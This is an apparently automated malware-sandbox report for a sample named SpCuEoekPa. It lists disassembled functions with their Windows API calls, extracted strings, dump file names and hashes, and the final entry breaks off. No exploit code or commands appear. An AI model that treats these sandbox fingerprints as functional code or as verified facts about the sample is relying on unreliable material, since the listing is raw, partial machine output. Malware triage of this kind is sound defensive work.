                                                            Function 003B7530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003F2C7C,?), ref: 003B76EA
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003F2C7C,?), ref: 003B7702
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,003EFB80,000000FF,?,00000000,00000800,00000000,?,003F2C7C,?), ref: 003B7727
                                                            • _memcmp.LIBCMT ref: 003B7748
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID: ,,?
                                                            • API String ID: 314563124-1094787077
                                                            • Opcode ID: 816948abb45dba9eddecce29c219eec0bb158a7c4f141c87f68976bba7242d54
                                                            • Instruction ID: b19f66157f973490f2283245980b17e2bc29bffdf320a842a5670a39c37cccbc
                                                            • Opcode Fuzzy Hash: 816948abb45dba9eddecce29c219eec0bb158a7c4f141c87f68976bba7242d54
                                                            • Instruction Fuzzy Hash: F6810D75A00109EFCB05DFA4C984EEEB7B9FF89315F214558F606AB250DB71AE06CB60
                                                            Function 003D85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 003D8613
                                                            • CharUpperBuffW.USER32(?,?), ref: 003D8722
                                                            • VariantClear.OLEAUT32(?), ref: 003D889A
                                                              • Part of subcall function 003C7562: VariantInit.OLEAUT32(00000000), ref: 003C75A2
                                                              • Part of subcall function 003C7562: VariantCopy.OLEAUT32(00000000,?), ref: 003C75AB
                                                              • Part of subcall function 003C7562: VariantClear.OLEAUT32(00000000), ref: 003C75B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            • Opcode ID: 095752acd5e81fdb74cd9c6edfd0585f174573056d2230a85140f790a3ba7c9f
                                                            • Instruction ID: 7cabd69306067ad946b410b535a6c5f43b05b92d01093dce76a3d7fc82d24174
                                                            • Opcode Fuzzy Hash: 095752acd5e81fdb74cd9c6edfd0585f174573056d2230a85140f790a3ba7c9f
                                                            • Instruction Fuzzy Hash: 88918C72608301DFC711DF24C48495ABBE8EF89714F14896EF98A8B3A1DB31E905CB92
                                                            Function 003C2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0037FC86: _wcscpy.LIBCMT ref: 0037FCA9
                                                            • _memset.LIBCMT ref: 003C2B87
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C2BB6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003C2C69
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003C2C97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            • Opcode ID: d06e8a358b276d0a45628900fc620805523b01ab9cba71c6290a0efa727ba25f
                                                            • Instruction ID: 9598dd7d267c4897114be43969e7689879fcbfd670f36371303676840a2d783c
                                                            • Opcode Fuzzy Hash: d06e8a358b276d0a45628900fc620805523b01ab9cba71c6290a0efa727ba25f
                                                            • Instruction Fuzzy Hash: A251CC712083019ED726AF28D885F6FB7E8AF99310F058A2DF895D61A0DBB0DC048792
                                                            Function 00373137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_free
                                                            • String ID: 3c7$_7
                                                            • API String ID: 2620147621-4188345352
                                                            • Opcode ID: aa641195e9695b029835d581087ea4b2bd28a44f0d77fa2182dd91d5344d0b4c
                                                            • Instruction ID: 120a1fd82065047b4ac1910f3bde8ee21addcef0d13b15d950bb7907ae88e133
                                                            • Opcode Fuzzy Hash: aa641195e9695b029835d581087ea4b2bd28a44f0d77fa2182dd91d5344d0b4c
                                                            • Instruction Fuzzy Hash: C3518B716087418FDB3ACF29C581B6BBBE5EF85310F09882DE88987350DB35E905CB82
                                                            Function 00376192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memset$_memmove
                                                            • String ID: 3c7$ERCP
                                                            • API String ID: 2532777613-2328722621
                                                            • Opcode ID: 6be3a460dd02b46ea37412c34d6690d0fcf5abb3a91b1bf56fb1336979fd1168
                                                            • Instruction ID: b8a556ff9b804136ef3fc1acb35c8681d0d419b86437d36485ba28d56a58dd1f
                                                            • Opcode Fuzzy Hash: 6be3a460dd02b46ea37412c34d6690d0fcf5abb3a91b1bf56fb1336979fd1168
                                                            • Instruction Fuzzy Hash: 9951A070900B05DBDB26DF65C9927EBB7F8EF04304F20896EE54ADB691E774AA44CB40
                                                            Function 003C2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003C27C0
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003C27DC
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 003C2822
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00425890,00000000), ref: 003C286B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            • Opcode ID: 0ae1c41c00d566a9374db9fb7e862348830f8d667c9491e8961e5e0526d0e5d9
                                                            • Instruction ID: e05482ef70037dcf86b16d9867ee06182ba2334b41b475e405958f4079e33ff3
                                                            • Opcode Fuzzy Hash: 0ae1c41c00d566a9374db9fb7e862348830f8d667c9491e8961e5e0526d0e5d9
                                                            • Instruction Fuzzy Hash: 3A417C702043419FDB22EF25D884F5BBBA8AF85314F054A2DF965DB291DB70AC05CB62
                                                            Function 003DD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003DD7C5
                                                              • Part of subcall function 0036784B: _memmove.LIBCMT ref: 00367899
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower_memmove
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 3425801089-567219261
                                                            • Opcode ID: 64ff304c43639b79ac6967ba44742f394e6b5412f9a861b01f377bc92c418460
                                                            • Instruction ID: be98efb75cef753cb87222d16e5fe9b1ca5b298673fdde6da47cb4d313d6e546
                                                            • Opcode Fuzzy Hash: 64ff304c43639b79ac6967ba44742f394e6b5412f9a861b01f377bc92c418460
                                                            • Instruction Fuzzy Hash: BC31A172904219ABCF06EF54C8519EEB3B4FF14320B10866AE8759B7D5DB71AD05CB80
                                                            Function 003B8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003B8F14
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003B8F27
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 003B8F57
                                                              • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 365058703-1403004172
                                                            • Opcode ID: 7819fe8e6515c961791cabfe0ba68d810962699ef3815c8239eea063e1f782df
                                                            • Instruction ID: 14aa81787e5c9e67294c862c5543683558dc0b2aa05774aed7f5b993aa683643
                                                            • Opcode Fuzzy Hash: 7819fe8e6515c961791cabfe0ba68d810962699ef3815c8239eea063e1f782df
                                                            • Instruction Fuzzy Hash: E621F071A04104BEDB16ABB0DC85DFFB76DDF05328F108629F5219B1E1DF394909D620
                                                            Function 003D182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003D184C
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D1872
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003D18A2
                                                            • InternetCloseHandle.WININET(00000000), ref: 003D18E9
                                                              • Part of subcall function 003D2483: GetLastError.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D2498
                                                              • Part of subcall function 003D2483: SetEvent.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D24AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: 1c2f5b49488b8db31302a21ecfdbf4fd285c622749a7d3c94b3b4d47e01c68eb
                                                            • Instruction ID: 0f0c449ee66fbe8907d42d2ddcd652d6b99b2d19f34036058ef62bfbc914eeae
                                                            • Opcode Fuzzy Hash: 1c2f5b49488b8db31302a21ecfdbf4fd285c622749a7d3c94b3b4d47e01c68eb
                                                            • Instruction Fuzzy Hash: 2E217FB2500208BFEB22DB65EC85EBB76EDEB48754F10412BF8059A340DA719D0567A1
                                                            Function 003E63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00361D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00361D73
                                                              • Part of subcall function 00361D35: GetStockObject.GDI32(00000011), ref: 00361D87
                                                              • Part of subcall function 00361D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00361D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003E6461
                                                            • LoadLibraryW.KERNEL32(?), ref: 003E6468
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003E647D
                                                            • DestroyWindow.USER32(?), ref: 003E6485
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: c03772f274167d5163ae2596e1717f3d8cf9277f9ff8ac82eda83526813f7c0b
                                                            • Instruction ID: fb317abf870343457f114af52dfb8c5c8394c26f0045f6eb5f892ff9bf017f7a
                                                            • Opcode Fuzzy Hash: c03772f274167d5163ae2596e1717f3d8cf9277f9ff8ac82eda83526813f7c0b
                                                            • Instruction Fuzzy Hash: B721CF712002A5BFEF124F66DC82EBB37ACEB683A4F114729F910961D0D771DC419B20
                                                            Function 003C6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 003C6DBC
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C6DEF
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 003C6E01
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003C6E3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 7409460735cd26bf33f7d8aeb3199eac906570d9e2a56f6b5c616d2f8bcdc135
                                                            • Instruction ID: 30b391039e59a8fc13043d970ca89f5a6c106efdb179e429ee18934f75527c23
                                                            • Opcode Fuzzy Hash: 7409460735cd26bf33f7d8aeb3199eac906570d9e2a56f6b5c616d2f8bcdc135
                                                            • Instruction Fuzzy Hash: 0321817560020AABDB219F29DC4AF9A77B8EF44720F204A2DFDA1DB2D0D7709D518B50
                                                            Function 003C6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 003C6E89
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003C6EBB
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 003C6ECC
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003C6F06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 7ffa489af9e6e48d8ade4ecfbae17347350768f53302296e93999e6b8e965151
                                                            • Instruction ID: c043e5d6e257ba6fc2082a71f4bff4c5ccf993d6776bbb0caaf5121b473cb8bf
                                                            • Opcode Fuzzy Hash: 7ffa489af9e6e48d8ade4ecfbae17347350768f53302296e93999e6b8e965151
                                                            • Instruction Fuzzy Hash: 87218E795003059BDB219F79DD46FAA77A8AF45720F204A1EF9A0D72D0D770AC518B50
                                                            Function 003CAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 003CAC54
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003CACA8
                                                            • __swprintf.LIBCMT ref: 003CACC1
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,003EF910), ref: 003CACFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: d5fbc7c05545ca48a98046fb25aca820cb59f7cae94ff7346f059ae67be30467
                                                            • Instruction ID: e4873a8ad682445ff86aeb75af7fa36b420be692b6c8fe791f9c75f616c0758d
                                                            • Opcode Fuzzy Hash: d5fbc7c05545ca48a98046fb25aca820cb59f7cae94ff7346f059ae67be30467
                                                            • Instruction Fuzzy Hash: CA216030A00109AFCB11EF65C985EEE7BBCEF49714B008569F909EB252DB71EA41CB61
                                                            Function 003C1142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C115F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C1184
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C118E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,003BFCED,?,003C0D40,?,00008000), ref: 003C11C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID: @<
                                                            • API String ID: 2875609808-354047512
                                                            • Opcode ID: e429829ce7035956cf12c8d61c3fe93485befa2c527257a0d4e03b87a4fa7202
                                                            • Instruction ID: b0f1f435e29798892461cfc33c75a46dd0582fcb816632f954f9db39b3b5cb18
                                                            • Opcode Fuzzy Hash: e429829ce7035956cf12c8d61c3fe93485befa2c527257a0d4e03b87a4fa7202
                                                            • Instruction Fuzzy Hash: B4117C31C0061CDBCF029FA4D899BEEBB78FF0A711F054159EA40F6281CB749950DBA5
                                                            Function 003C1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 003C1B19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: 67b26772f1a5cc90f1f992b08946e5962a12c55c59bde5dd578da2796c072ae9
                                                            • Instruction ID: 5ed369204e3c270ec8f6a3f269c52e27421baf413c813955601463ef42a3d31d
                                                            • Opcode Fuzzy Hash: 67b26772f1a5cc90f1f992b08946e5962a12c55c59bde5dd578da2796c072ae9
                                                            • Instruction Fuzzy Hash: 3C118B349102089FCF09EFA4D8529EEB3B4FF26304B5084A9D814AB292EB325D0ADF50
                                                            Function 003DEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003DEC07
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003DEC37
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003DED6A
                                                            • CloseHandle.KERNEL32(?), ref: 003DEDEB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
